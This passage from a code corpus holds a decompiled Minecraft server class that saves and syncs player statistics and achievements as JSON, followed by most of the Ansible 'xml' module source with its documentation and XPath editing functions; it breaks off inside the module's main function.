import net.minecraft.util.TupleIntJsonSerializable;
import org.apache.commons.io.FileUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class StatisticsFile extends StatFileWriter
{
private static final Logger logger = LogManager.getLogger();
private final MinecraftServer field_150890_c;
private final File field_150887_d;
private final Set field_150888_e = Sets.newHashSet();
private int field_150885_f = -300;
private boolean field_150886_g = false;
private static final String __OBFID = "CL_00001471";
public StatisticsFile(MinecraftServer p_i45306_1_, File p_i45306_2_)
{
this.field_150890_c = p_i45306_1_;
this.field_150887_d = p_i45306_2_;
}
public void func_150882_a()
{
if (this.field_150887_d.isFile())
{
try
{
this.field_150875_a.clear();
this.field_150875_a.putAll(this.func_150881_a(FileUtils.readFileToString(this.field_150887_d)));
}
catch (IOException ioexception)
{
logger.error("Couldn\'t read statistics file " + this.field_150887_d, ioexception);
}
catch (JsonParseException jsonparseexception)
{
logger.error("Couldn\'t parse statistics file " + this.field_150887_d, jsonparseexception);
}
}
}
public void func_150883_b()
{
try
{
FileUtils.writeStringToFile(this.field_150887_d, func_150880_a(this.field_150875_a));
}
catch (IOException ioexception)
{
logger.error("Couldn\'t save stats", ioexception);
}
}
public void func_150873_a(EntityPlayer p_150873_1_, StatBase p_150873_2_, int p_150873_3_)
{
int j = p_150873_2_.isAchievement() ? this.writeStat(p_150873_2_) : 0;
super.func_150873_a(p_150873_1_, p_150873_2_, p_150873_3_);
this.field_150888_e.add(p_150873_2_);
if (p_150873_2_.isAchievement() && j == 0 && p_150873_3_ > 0)
{
this.field_150886_g = true;
if (this.field_150890_c.func_147136_ar())
{
this.field_150890_c.getConfigurationManager().sendChatMsg(new ChatComponentTranslation("chat.type.achievement", new Object[] {p_150873_1_.func_145748_c_(), p_150873_2_.func_150955_j()}));
}
}
}
public Set func_150878_c()
{
HashSet hashset = Sets.newHashSet(this.field_150888_e);
this.field_150888_e.clear();
this.field_150886_g = false;
return hashset;
}
public Map func_150881_a(String p_150881_1_)
{
JsonElement jsonelement = (new JsonParser()).parse(p_150881_1_);
if (!jsonelement.isJsonObject())
{
return Maps.newHashMap();
}
else
{
JsonObject jsonobject = jsonelement.getAsJsonObject();
HashMap hashmap = Maps.newHashMap();
Iterator iterator = jsonobject.entrySet().iterator();
while (iterator.hasNext())
{
Entry entry = (Entry)iterator.next();
StatBase statbase = StatList.func_151177_a((String)entry.getKey());
if (statbase != null)
{
TupleIntJsonSerializable tupleintjsonserializable = new TupleIntJsonSerializable();
if (((JsonElement)entry.getValue()).isJsonPrimitive() && ((JsonElement)entry.getValue()).getAsJsonPrimitive().isNumber())
{
tupleintjsonserializable.setIntegerValue(((JsonElement)entry.getValue()).getAsInt());
}
else if (((JsonElement)entry.getValue()).isJsonObject())
{
JsonObject jsonobject1 = ((JsonElement)entry.getValue()).getAsJsonObject();
if (jsonobject1.has("value") && jsonobject1.get("value").isJsonPrimitive() && jsonobject1.get("value").getAsJsonPrimitive().isNumber())
{
tupleintjsonserializable.setIntegerValue(jsonobject1.getAsJsonPrimitive("value").getAsInt());
}
if (jsonobject1.has("progress") && statbase.func_150954_l() != null)
{
try
{
Constructor constructor = statbase.func_150954_l().getConstructor(new Class[0]);
IJsonSerializable ijsonserializable = (IJsonSerializable)constructor.newInstance(new Object[0]);
ijsonserializable.func_152753_a(jsonobject1.get("progress"));
tupleintjsonserializable.setJsonSerializableValue(ijsonserializable);
}
catch (Throwable throwable)
{
logger.warn("Invalid statistic progress in " + this.field_150887_d, throwable);
}
}
}
hashmap.put(statbase, tupleintjsonserializable);
}
else
{
logger.warn("Invalid statistic in " + this.field_150887_d + ": Don\'t know what " + (String)entry.getKey() + " is");
}
}
return hashmap;
}
}
public static String func_150880_a(Map p_150880_0_)
{
JsonObject jsonobject = new JsonObject();
Iterator iterator = p_150880_0_.entrySet().iterator();
while (iterator.hasNext())
{
Entry entry = (Entry)iterator.next();
if (((TupleIntJsonSerializable)entry.getValue()).getJsonSerializableValue() != null)
{
JsonObject jsonobject1 = new JsonObject();
jsonobject1.addProperty("value", Integer.valueOf(((TupleIntJsonSerializable)entry.getValue()).getIntegerValue()));
try
{
jsonobject1.add("progress", ((TupleIntJsonSerializable)entry.getValue()).getJsonSerializableValue().getSerializableElement());
}
catch (Throwable throwable)
{
logger.warn("Couldn\'t save statistic " + ((StatBase)entry.getKey()).func_150951_e() + ": error serializing progress", throwable);
}
jsonobject.add(((StatBase)entry.getKey()).statId, jsonobject1);
}
else
{
jsonobject.addProperty(((StatBase)entry.getKey()).statId, Integer.valueOf(((TupleIntJsonSerializable)entry.getValue()).getIntegerValue()));
}
}
return jsonobject.toString();
}
public void func_150877_d()
{
Iterator iterator = this.field_150875_a.keySet().iterator();
while (iterator.hasNext())
{
StatBase statbase = (StatBase)iterator.next();
this.field_150888_e.add(statbase);
}
}
public void func_150876_a(EntityPlayerMP p_150876_1_)
{
int i = this.field_150890_c.getTickCounter();
HashMap hashmap = Maps.newHashMap();
if (this.field_150886_g || i - this.field_150885_f > 300)
{
this.field_150885_f = i;
Iterator iterator = this.func_150878_c().iterator();
while (iterator.hasNext())
{
StatBase statbase = (StatBase)iterator.next();
hashmap.put(statbase, Integer.valueOf(this.writeStat(statbase)));
}
}
p_150876_1_.playerNetServerHandler.sendPacket(new S37PacketStatistics(hashmap));
}
public void func_150884_b(EntityPlayerMP p_150884_1_)
{
HashMap hashmap = Maps.newHashMap();
Iterator iterator = AchievementList.achievementList.iterator();
while (iterator.hasNext())
{
Achievement achievement = (Achievement)iterator.next();
if (this.hasAchievementUnlocked(achievement))
{
hashmap.put(achievement, Integer.valueOf(this.writeStat(achievement)));
this.field_150888_e.remove(achievement);
}
}
p_150884_1_.playerNetServerHandler.sendPacket(new S37PacketStatistics(hashmap));
}
public boolean func_150879_e()
{
return this.field_150886_g;
}
} | xtrafrancyz/Cauldron | eclipse/cauldron/src/main/java/net/minecraft/stats/StatisticsFile.java | Java | gpl-3.0 | 9,353 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Red Hat, Inc.
# Copyright: (c) 2014, Tim Bielawa <tbielawa@redhat.com>
# Copyright: (c) 2014, Magnus Hedemark <mhedemar@redhat.com>
# Copyright: (c) 2017, Dag Wieers <dag@wieers.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: xml
short_description: Manage bits and pieces of XML files or strings
description:
- A CRUD-like interface to managing bits of XML files.
version_added: '2.4'
options:
path:
description:
- Path to the file to operate on.
- This file must exist ahead of time.
- This parameter is required, unless C(xmlstring) is given.
type: path
required: yes
aliases: [ dest, file ]
xmlstring:
description:
- A string containing XML on which to operate.
- This parameter is required, unless C(path) is given.
type: str
required: yes
xpath:
description:
- A valid XPath expression describing the item(s) you want to manipulate.
- Operates on the document root, C(/), by default.
type: str
namespaces:
description:
- The namespace C(prefix:uri) mapping for the XPath expression.
- Needs to be a C(dict), not a C(list) of items.
type: dict
state:
description:
- Set or remove an xpath selection (node(s), attribute(s)).
type: str
choices: [ absent, present ]
default: present
aliases: [ ensure ]
attribute:
description:
- The attribute to select when using parameter C(value).
- This is a string, not prepended with C(@).
type: raw
value:
description:
- Desired state of the selected attribute.
- Either a string, or to unset a value, the Python C(None) keyword (YAML Equivalent, C(null)).
- Elements default to no value (but present).
- Attributes default to an empty string.
type: raw
add_children:
description:
- Add additional child-element(s) to a selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: list
set_children:
description:
- Set the child-element(s) of a selected element for a given C(xpath).
- Removes any existing children.
- Child elements must be specified as in C(add_children).
- This parameter requires C(xpath) to be set.
type: list
count:
description:
- Search for a given C(xpath) and provide the count of any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
print_match:
description:
- Search for a given C(xpath) and print out any matches.
- This parameter requires C(xpath) to be set.
type: bool
default: no
pretty_print:
description:
- Pretty print XML output.
type: bool
default: no
content:
description:
- Search for a given C(xpath) and get content.
- This parameter requires C(xpath) to be set.
type: str
choices: [ attribute, text ]
input_type:
description:
- Type of input for C(add_children) and C(set_children).
type: str
choices: [ xml, yaml ]
default: yaml
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
strip_cdata_tags:
description:
- Remove CDATA tags surrounding text values.
- Note that this might break your XML file if text values contain characters that could be interpreted as XML.
type: bool
default: no
version_added: '2.7'
insertbefore:
description:
- Add additional child-element(s) before the first selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
insertafter:
description:
- Add additional child-element(s) after the last selected element for a given C(xpath).
- Child elements must be given in a list and each item may be either a string
(eg. C(children=ansible) to add an empty C(<ansible/>) child element),
or a hash where the key is an element name and the value is the element value.
- This parameter requires C(xpath) to be set.
type: bool
default: no
version_added: '2.8'
requirements:
- lxml >= 2.3.0
notes:
- Use the C(--check) and C(--diff) options when testing your expressions.
- The diff output is automatically pretty-printed, so may not reflect the actual file content, only the file structure.
- This module does not handle complicated xpath expressions, so limit xpath selectors to simple expressions.
- Beware that in case your XML elements are namespaced, you need to use the C(namespaces) parameter, see the examples.
- Namespaces prefix should be used for all children of an element where namespace is defined, unless another namespace is defined for them.
seealso:
- name: Xml module development community wiki
description: More information related to the development of this xml module.
link: https://github.com/ansible/community/wiki/Module:-xml
- name: Introduction to XPath
description: A brief tutorial on XPath (w3schools.com).
link: https://www.w3schools.com/xml/xpath_intro.asp
- name: XPath Reference document
description: The reference documentation on XSLT/XPath (developer.mozilla.org).
link: https://developer.mozilla.org/en-US/docs/Web/XPath
author:
- Tim Bielawa (@tbielawa)
- Magnus Hedemark (@magnus919)
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
# Consider the following XML file:
#
# <business type="bar">
# <name>Tasty Beverage Co.</name>
# <beers>
# <beer>Rochefort 10</beer>
# <beer>St. Bernardus Abbot 12</beer>
# <beer>Schlitz</beer>
# </beers>
# <rating subjective="true">10</rating>
# <website>
# <mobilefriendly/>
# <address>http://tastybeverageco.com</address>
# </website>
# </business>
- name: Remove the 'subjective' attribute of the 'rating' element
xml:
path: /foo/bar.xml
xpath: /business/rating/@subjective
state: absent
- name: Set the rating to '11'
xml:
path: /foo/bar.xml
xpath: /business/rating
value: 11
# Retrieve and display the number of nodes
- name: Get count of 'beers' nodes
xml:
path: /foo/bar.xml
xpath: /business/beers/beer
count: yes
register: hits
- debug:
var: hits.count
# Example where parent XML nodes are created automatically
- name: Add a 'phonenumber' element to the 'business' element
xml:
path: /foo/bar.xml
xpath: /business/phonenumber
value: 555-555-1234
- name: Add several more beers to the 'beers' element
xml:
path: /foo/bar.xml
xpath: /business/beers
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
- name: Add several more beers to the 'beers' element and add them before the 'Rochefort 10' element
xml:
path: /foo/bar.xml
xpath: '/business/beers/beer[text()=\"Rochefort 10\"]'
insertbefore: yes
add_children:
- beer: Old Rasputin
- beer: Old Motor Oil
- beer: Old Curmudgeon
# NOTE: The 'state' defaults to 'present' and 'value' defaults to 'null' for elements
- name: Add a 'validxhtml' element to the 'website' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
- name: Add an empty 'validatedon' attribute to the 'validxhtml' element
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml/@validatedon
- name: Add or modify an attribute, add element if needed
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
attribute: validatedon
value: 1976-08-05
# How to read an attribute value and access it in Ansible
- name: Read attribute value
xml:
path: /foo/bar.xml
xpath: /business/website/validxhtml
content: attribute
attribute: validatedon
register: xmlresp
- name: Show attribute value
debug:
var: xmlresp.matches[0].validxhtml.validatedon
- name: Remove all children from the 'website' element (option 1)
xml:
path: /foo/bar.xml
xpath: /business/website/*
state: absent
- name: Remove all children from the 'website' element (option 2)
xml:
path: /foo/bar.xml
xpath: /business/website
children: []
# In case of namespaces, like in below XML, they have to be explicitely stated.
#
# <foo xmlns="http://x.test" xmlns:attr="http://z.test">
# <bar>
# <baz xmlns="http://y.test" attr:my_namespaced_attribute="true" />
# </bar>
# </foo>
# NOTE: There is the prefix 'x' in front of the 'bar' element, too.
- name: Set namespaced '/x:foo/x:bar/y:baz/@z:my_namespaced_attribute' to 'false'
xml:
path: foo.xml
xpath: /x:foo/x:bar/y:baz
namespaces:
x: http://x.test
y: http://y.test
z: http://z.test
attribute: z:my_namespaced_attribute
value: 'false'
'''
RETURN = r'''
actions:
description: A dictionary with the original xpath, namespaces and state.
type: dict
returned: success
sample: {xpath: xpath, namespaces: [namespace1, namespace2], state=present}
backup_file:
description: The name of the backup file that was created
type: str
returned: when backup=yes
sample: /path/to/file.xml.1942.2017-08-24@14:16:01~
count:
description: The count of xpath matches.
type: int
returned: when parameter 'count' is set
sample: 2
matches:
description: The xpath matches found.
type: list
returned: when parameter 'print_match' is set
msg:
description: A message related to the performed action(s).
type: str
returned: always
xmlstring:
description: An XML string of the resulting output.
type: str
returned: when parameter 'xmlstring' is set
'''
import copy
import json
import os
import re
import traceback
from distutils.version import LooseVersion
from io import BytesIO
try:
from lxml import etree, objectify
HAS_LXML = True
except ImportError:
HAS_LXML = False
from ansible.module_utils.basic import AnsibleModule, json_dict_bytes_to_unicode
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.module_utils.common._collections_compat import MutableMapping
_IDENT = r"[a-zA-Z-][a-zA-Z0-9_\-\.]*"
_NSIDENT = _IDENT + "|" + _IDENT + ":" + _IDENT
# Note: we can't reasonably support the 'if you need to put both ' and " in a string, concatenate
# strings wrapped by the other delimiter' XPath trick, especially as simple XPath.
_XPSTR = "('(?:.*)'|\"(?:.*)\")"
_RE_SPLITSIMPLELAST = re.compile("^(.*)/(" + _NSIDENT + ")$")
_RE_SPLITSIMPLELASTEQVALUE = re.compile("^(.*)/(" + _NSIDENT + ")/text\\(\\)=" + _XPSTR + "$")
_RE_SPLITSIMPLEATTRLAST = re.compile("^(.*)/(@(?:" + _NSIDENT + "))$")
_RE_SPLITSIMPLEATTRLASTEQVALUE = re.compile("^(.*)/(@(?:" + _NSIDENT + "))=" + _XPSTR + "$")
_RE_SPLITSUBLAST = re.compile("^(.*)/(" + _NSIDENT + ")\\[(.*)\\]$")
_RE_SPLITONLYEQVALUE = re.compile("^(.*)/text\\(\\)=" + _XPSTR + "$")
def has_changed(doc):
orig_obj = etree.tostring(objectify.fromstring(etree.tostring(orig_doc)))
obj = etree.tostring(objectify.fromstring(etree.tostring(doc)))
return (orig_obj != obj)
def do_print_match(module, tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
match_xpaths = []
for m in match:
match_xpaths.append(tree.getpath(m))
match_str = json.dumps(match_xpaths)
msg = "selector '%s' match: %s" % (xpath, match_str)
finish(module, tree, xpath, namespaces, changed=False, msg=msg)
def count_nodes(module, tree, xpath, namespaces):
""" Return the count of nodes matching the xpath """
hits = tree.xpath("count(/%s)" % xpath, namespaces=namespaces)
msg = "found %d nodes" % hits
finish(module, tree, xpath, namespaces, changed=False, msg=msg, hitcount=int(hits))
def is_node(tree, xpath, namespaces):
""" Test if a given xpath matches anything and if that match is a node.
For now we just assume you're only searching for one specific thing."""
if xpath_matches(tree, xpath, namespaces):
# OK, it found something
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._Element):
return True
return False
def is_attribute(tree, xpath, namespaces):
""" Test if a given xpath matches and that match is an attribute
An xpath attribute search will only match one item"""
if xpath_matches(tree, xpath, namespaces):
match = tree.xpath(xpath, namespaces=namespaces)
if isinstance(match[0], etree._ElementStringResult):
return True
elif isinstance(match[0], etree._ElementUnicodeResult):
return True
return False
def xpath_matches(tree, xpath, namespaces):
""" Test if a node exists """
if tree.xpath(xpath, namespaces=namespaces):
return True
return False
def delete_xpath_target(module, tree, xpath, namespaces):
""" Delete an attribute or element from a tree """
try:
for result in tree.xpath(xpath, namespaces=namespaces):
# Get the xpath for this result
if is_attribute(tree, xpath, namespaces):
# Delete an attribute
parent = result.getparent()
# Pop this attribute match out of the parent
# node's 'attrib' dict by using this match's
# 'attrname' attribute for the key
parent.attrib.pop(result.attrname)
elif is_node(tree, xpath, namespaces):
# Delete an element
result.getparent().remove(result)
else:
raise Exception("Impossible error")
except Exception as e:
module.fail_json(msg="Couldn't delete xpath target: %s (%s)" % (xpath, e))
else:
finish(module, tree, xpath, namespaces, changed=True)
def replace_children_of(children, match):
for element in match.getchildren():
match.remove(element)
match.extend(children)
def set_target_children_inner(module, tree, xpath, namespaces, children, in_type):
matches = tree.xpath(xpath, namespaces=namespaces)
# Create a list of our new children
children = children_to_nodes(module, children, in_type)
children_as_string = [etree.tostring(c) for c in children]
changed = False
# xpaths always return matches as a list, so....
for match in matches:
# Check if elements differ
if len(match.getchildren()) == len(children):
for idx, element in enumerate(match.getchildren()):
if etree.tostring(element) != children_as_string[idx]:
replace_children_of(children, match)
changed = True
break
else:
replace_children_of(children, match)
changed = True
return changed
def set_target_children(module, tree, xpath, namespaces, children, in_type):
changed = set_target_children_inner(module, tree, xpath, namespaces, children, in_type)
# Write it out
finish(module, tree, xpath, namespaces, changed=changed)
def add_target_children(module, tree, xpath, namespaces, children, in_type, insertbefore, insertafter):
if is_node(tree, xpath, namespaces):
new_kids = children_to_nodes(module, children, in_type)
if insertbefore or insertafter:
insert_target_children(tree, xpath, namespaces, new_kids, insertbefore, insertafter)
else:
for node in tree.xpath(xpath, namespaces=namespaces):
node.extend(new_kids)
finish(module, tree, xpath, namespaces, changed=True)
else:
finish(module, tree, xpath, namespaces)
def insert_target_children(tree, xpath, namespaces, children, insertbefore, insertafter):
"""
Insert the given children before or after the given xpath. If insertbefore is True, it is inserted before the
first xpath hit, with insertafter, it is inserted after the last xpath hit.
"""
insert_target = tree.xpath(xpath, namespaces=namespaces)
loc_index = 0 if insertbefore else -1
index_in_parent = insert_target[loc_index].getparent().index(insert_target[loc_index])
parent = insert_target[0].getparent()
if insertafter:
index_in_parent += 1
for child in children:
parent.insert(index_in_parent, child)
index_in_parent += 1
def _extract_xpstr(g):
return g[1:-1]
def split_xpath_last(xpath):
"""split an XPath of the form /foo/bar/baz into /foo/bar and baz"""
xpath = xpath.strip()
m = _RE_SPLITSIMPLELAST.match(xpath)
if m:
# requesting an element to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLELASTEQVALUE.match(xpath)
if m:
# requesting an element to exist with an inner text
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSIMPLEATTRLAST.match(xpath)
if m:
# requesting an attribute to exist
return (m.group(1), [(m.group(2), None)])
m = _RE_SPLITSIMPLEATTRLASTEQVALUE.match(xpath)
if m:
# requesting an attribute to exist with a value
return (m.group(1), [(m.group(2), _extract_xpstr(m.group(3)))])
m = _RE_SPLITSUBLAST.match(xpath)
if m:
content = [x.strip() for x in m.group(3).split(" and ")]
return (m.group(1), [('/' + m.group(2), content)])
m = _RE_SPLITONLYEQVALUE.match(xpath)
if m:
# requesting a change of inner text
return (m.group(1), [("", _extract_xpstr(m.group(2)))])
return (xpath, [])
def nsnameToClark(name, namespaces):
if ":" in name:
(nsname, rawname) = name.split(":")
# return "{{%s}}%s" % (namespaces[nsname], rawname)
return "{{{0}}}{1}".format(namespaces[nsname], rawname)
# no namespace name here
return name
def check_or_make_target(module, tree, xpath, namespaces):
(inner_xpath, changes) = split_xpath_last(xpath)
if (inner_xpath == xpath) or (changes is None):
module.fail_json(msg="Can't process Xpath %s in order to spawn nodes! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
return False
changed = False
if not is_node(tree, inner_xpath, namespaces):
changed = check_or_make_target(module, tree, inner_xpath, namespaces)
# we test again after calling check_or_make_target
if is_node(tree, inner_xpath, namespaces) and changes:
for (eoa, eoa_value) in changes:
if eoa and eoa[0] != '@' and eoa[0] != '/':
# implicitly creating an element
new_kids = children_to_nodes(module, [nsnameToClark(eoa, namespaces)], "yaml")
if eoa_value:
for nk in new_kids:
nk.text = eoa_value
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa and eoa[0] == '/':
element = eoa[1:]
new_kids = children_to_nodes(module, [nsnameToClark(element, namespaces)], "yaml")
for node in tree.xpath(inner_xpath, namespaces=namespaces):
node.extend(new_kids)
for nk in new_kids:
for subexpr in eoa_value:
# module.fail_json(msg="element=%s subexpr=%s node=%s now tree=%s" %
# (element, subexpr, etree.tostring(node, pretty_print=True), etree.tostring(tree, pretty_print=True))
check_or_make_target(module, nk, "./" + subexpr, namespaces)
changed = True
# module.fail_json(msg="now tree=%s" % etree.tostring(tree, pretty_print=True))
elif eoa == "":
for node in tree.xpath(inner_xpath, namespaces=namespaces):
if (node.text != eoa_value):
node.text = eoa_value
changed = True
elif eoa and eoa[0] == '@':
attribute = nsnameToClark(eoa[1:], namespaces)
for element in tree.xpath(inner_xpath, namespaces=namespaces):
changing = (attribute not in element.attrib or element.attrib[attribute] != eoa_value)
if changing:
changed = changed or changing
if eoa_value is None:
value = ""
else:
value = eoa_value
element.attrib[attribute] = value
# module.fail_json(msg="arf %s changing=%s as curval=%s changed tree=%s" %
# (xpath, changing, etree.tostring(tree, changing, element[attribute], pretty_print=True)))
else:
module.fail_json(msg="unknown tree transformation=%s" % etree.tostring(tree, pretty_print=True))
return changed
def ensure_xpath_exists(module, tree, xpath, namespaces):
changed = False
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
finish(module, tree, xpath, namespaces, changed)
def set_target_inner(module, tree, xpath, namespaces, attribute, value):
changed = False
try:
if not is_node(tree, xpath, namespaces):
changed = check_or_make_target(module, tree, xpath, namespaces)
except Exception as e:
missing_namespace = ""
# NOTE: This checks only the namespaces defined in root element!
# TODO: Implement a more robust check to check for child namespaces' existance
if tree.getroot().nsmap and ":" not in xpath:
missing_namespace = "XML document has namespace(s) defined, but no namespace prefix(es) used in xpath!\n"
module.fail_json(msg="%sXpath %s causes a failure: %s\n -- tree is %s" %
(missing_namespace, xpath, e, etree.tostring(tree, pretty_print=True)), exception=traceback.format_exc())
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node! tree is %s" %
(xpath, etree.tostring(tree, pretty_print=True)))
for element in tree.xpath(xpath, namespaces=namespaces):
if not attribute:
changed = changed or (element.text != value)
if element.text != value:
element.text = value
else:
changed = changed or (element.get(attribute) != value)
if ":" in attribute:
attr_ns, attr_name = attribute.split(":")
# attribute = "{{%s}}%s" % (namespaces[attr_ns], attr_name)
attribute = "{{{0}}}{1}".format(namespaces[attr_ns], attr_name)
if element.get(attribute) != value:
element.set(attribute, value)
return changed
def set_target(module, tree, xpath, namespaces, attribute, value):
changed = set_target_inner(module, tree, xpath, namespaces, attribute, value)
finish(module, tree, xpath, namespaces, changed)
def get_element_text(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
elements.append({element.tag: element.text})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def get_element_attr(module, tree, xpath, namespaces):
if not is_node(tree, xpath, namespaces):
module.fail_json(msg="Xpath %s does not reference a node!" % xpath)
elements = []
for element in tree.xpath(xpath, namespaces=namespaces):
child = {}
for key in element.keys():
value = element.get(key)
child.update({key: value})
elements.append({element.tag: child})
finish(module, tree, xpath, namespaces, changed=False, msg=len(elements), hitcount=len(elements), matches=elements)
def child_to_element(module, child, in_type):
if in_type == 'xml':
infile = BytesIO(to_bytes(child, errors='surrogate_or_strict'))
try:
parser = etree.XMLParser()
node = etree.parse(infile, parser)
return node.getroot()
except etree.XMLSyntaxError as e:
module.fail_json(msg="Error while parsing child element: %s" % e)
elif in_type == 'yaml':
if isinstance(child, string_types):
return etree.Element(child)
elif isinstance(child, MutableMapping):
if len(child) > 1:
module.fail_json(msg="Can only create children from hashes with one key")
(key, value) = next(iteritems(child))
if isinstance(value, MutableMapping):
children = value.pop('_', None)
node = etree.Element(key, value)
if children is not None:
if not isinstance(children, list):
module.fail_json(msg="Invalid children type: %s, must be list." % type(children))
subnodes = children_to_nodes(module, children)
node.extend(subnodes)
else:
node = etree.Element(key)
node.text = value
return node
else:
module.fail_json(msg="Invalid child type: %s. Children must be either strings or hashes." % type(child))
else:
module.fail_json(msg="Invalid child input type: %s. Type must be either xml or yaml." % in_type)
def children_to_nodes(module=None, children=None, type='yaml'):
"""turn a str/hash/list of str&hash into a list of elements"""
children = [] if children is None else children
return [child_to_element(module, child, type) for child in children]
def make_pretty(module, tree):
xml_string = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
result = dict(
changed=False,
)
if module.params['path']:
xml_file = module.params['path']
with open(xml_file, 'rb') as xml_content:
if xml_string != xml_content.read():
result['changed'] = True
if not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(xml_file, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
elif module.params['xmlstring']:
result['xmlstring'] = xml_string
# NOTE: Modifying a string is not considered a change !
if xml_string != module.params['xmlstring']:
result['changed'] = True
module.exit_json(**result)
def finish(module, tree, xpath, namespaces, changed=False, msg='', hitcount=0, matches=tuple()):
result = dict(
actions=dict(
xpath=xpath,
namespaces=namespaces,
state=module.params['state']
),
changed=has_changed(tree),
)
if module.params['count'] or hitcount:
result['count'] = hitcount
if module.params['print_match'] or matches:
result['matches'] = matches
if msg:
result['msg'] = msg
if result['changed']:
if module._diff:
result['diff'] = dict(
before=etree.tostring(orig_doc, xml_declaration=True, encoding='UTF-8', pretty_print=True),
after=etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=True),
)
if module.params['path'] and not module.check_mode:
if module.params['backup']:
result['backup_file'] = module.backup_local(module.params['path'])
tree.write(module.params['path'], xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
if module.params['xmlstring']:
result['xmlstring'] = etree.tostring(tree, xml_declaration=True, encoding='UTF-8', pretty_print=module.params['pretty_print'])
module.exit_json(**result)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', aliases=['dest', 'file']),
xmlstring=dict(type='str'),
xpath=dict(type='str'),
namespaces=dict(type='dict', default={}),
state=dict(type='str', default='present', choices=['absent', 'present'], aliases=['ensure']),
value=dict(type='raw'),
attribute=dict(type='raw'),
add_children=dict(type='list'),
set_children=dict(type='list'),
count=dict(type='bool', default=False),
print_match=dict(type='bool', default=False),
pretty_print=dict(type='bool', default=False),
content=dict(type='str', choices=['attribute', 'text']),
input_type=dict(type='str', default='yaml', choices=['xml', 'yaml']),
backup=dict(type='bool', default=False),
strip_cdata_tags=dict(type='bool', default=False),
insertbefore=dict(type='bool', default=False),
insertafter=dict(type='bool', default=False),
),
supports_check_mode=True,
# TODO: Implement this as soon as #28662 (required_by functionality) is merged
# required_by=dict(
# add_children=['xpath'],
# attribute=['value'],
# set_children=['xpath'],
# value=['xpath'],
# ),
required_if=[
['content', 'attribute', ['xpath']],
['content', 'text', ['xpath']],
['count', True, ['xpath']],
['print_match', True, ['xpath']],
['insertbefore', True, ['xpath']],
['insertafter', True, ['xpath']],
],
required_one_of=[
['path', 'xmlstring'],
['add_children', 'content', 'count', 'pretty_print', 'print_match', 'set_children', 'value'],
],
mutually_exclusive=[
['add_children', 'content', 'count', 'print_match', 'set_children', 'value'],
['path', 'xmlstring'],
['insertbefore', 'insertafter'],
],
)
xml_file = module.params['path']
xml_string = module.params['xmlstring']
xpath = module.params['xpath']
namespaces = module.params['namespaces']
state = module.params['state']
value = json_dict_bytes_to_unicode(module.params['value'])
attribute = module.params['attribute']
set_children = json_dict_bytes_to_unicode(module.params['set_children'])
add_children = json_dict_bytes_to_unicode(module.params['add_children'])
pretty_print = module.params['pretty_print']
content = module.params['content']
input_type = module.params['input_type']
print_match = module.params['print_match']
count = module.params['count']
backup = module.params['backup']
strip_cdata_tags = module.params['strip_cdata_tags']
insertbefore = module.params['insertbefore']
insertafter = module.params['insertafter']
# Check if we have lxml 2.3.0 or newer installed
if not HAS_LXML:
module.fail_json(msg='The xml ansible module requires the lxml python library installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('2.3.0'):
module.fail_json(msg='The xml ansible module requires lxml 2.3.0 or newer installed on the managed machine')
elif LooseVersion('.'.join(to_native(f) for f in etree.LXML_VERSION)) < LooseVersion('3.0.0'):
module.warn('Using lxml version lower than 3.0.0 does not guarantee predictable element attribute order.')
# Check if the file exists
if xml_string:
infile = BytesIO(to_bytes(xml_string, errors='surrogate_or_strict'))
elif os.path.isfile(xml_file):
infile = open(xml_file, 'rb')
else:
module.fail_json(msg="The target XML source '%s' does not exist." % xml_file)
# Parse and evaluate xpath expression
if xpath is not None:
try:
etree.XPath(xpath)
except etree.XPathSyntaxError as e:
module.fail_json(msg="Syntax error in xpath expression: %s (%s)" % (xpath, e))
except etree.XPathEvalError as e:
